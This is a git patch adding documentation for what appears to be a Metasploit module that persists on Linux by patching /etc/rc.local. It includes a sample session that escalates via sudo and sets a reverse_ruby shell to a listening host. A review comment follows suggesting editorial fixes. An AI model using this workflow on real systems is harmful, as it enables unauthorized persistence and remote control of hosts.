From aa58634b240e46e1b28bd53fe61f97c568ff2844 Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Mon, 16 Jul 2018 09:34:20 +0200 Subject: [PATCH] Document rc.local --- .../linux/local/rc_local_persistence.md | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 documentation/modules/exploit/linux/local/rc_local_persistence.md diff --git a/documentation/modules/exploit/linux/local/rc_local_persistence.md b/documentation/modules/exploit/linux/local/rc_local_persistence.md new file mode 100644 index 0000000000..60abc22375 --- /dev/null +++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md @@ -0,0 +1,46 @@ +## rc.local Persistence + +This module patch `/etc/rc.local` in order to launch a payload upon reboots. + + +### Verification + +1. Exploit a box and get a **root** session (tip: try `post/multi/manage/sudo`) +2. `use exploit/linux/local/rc_local_persistence` +3. `set SESSION #` +4. `set PAYLOAD #` +5. `set LHOST ##` +6. `exploit` + + +### Sample run + +#### Escalate the session if needed + +``` +msf5 exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo +msf5 post(multi/manage/sudo) > set session 3 +session => 3 +msf5 post(multi/manage/sudo) > run + +[*] SUDO: Attempting to upgrade to UID 0 via sudo +[*] No password available, trying a passwordless sudo. +[+] SUDO: Root shell secured. +[*] Post module execution completed +``` + +#### Persist + +``` +msf5 post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence +msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ruby +payload => cmd/unix/reverse_ruby +msf5 exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41 +LHOST => 192.168.0.41` +msf5 exploit(linux/local/rc_local_persistence) > run + +[*] Reading /etc/rc.local +[*] Patching /etc/rc.local +[*] Max line length is 65537 +[*] Writing 650 bytes in 1 chunks of 2251 bytes (octal-encoded), using printf +```
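Review bot: In the "Persist" sample run, the prompt on the `set payload` line reads `msf5 exploit(multi/handler) >` although the line before it ran `use exploit/linux/local/rc_local_persistence`, and the `LHOST => 192.168.0.41` output line ends with a stray backtick. Both look like paste errors and should be fixed so the transcript matches a real session. That block also never shows `set SESSION`, which Verification step 3 requires, so the sample should include it. In the introduction, "This module patch" should read "This module patches". The Verification list stops at `exploit` without a final step stating the expected result (that the payload runs after a reboot), and the document says nothing about what is written to `/etc/rc.local` or how to restore the file afterwards. A short cleanup section would help testers and anyone reviewing the host after the engagement.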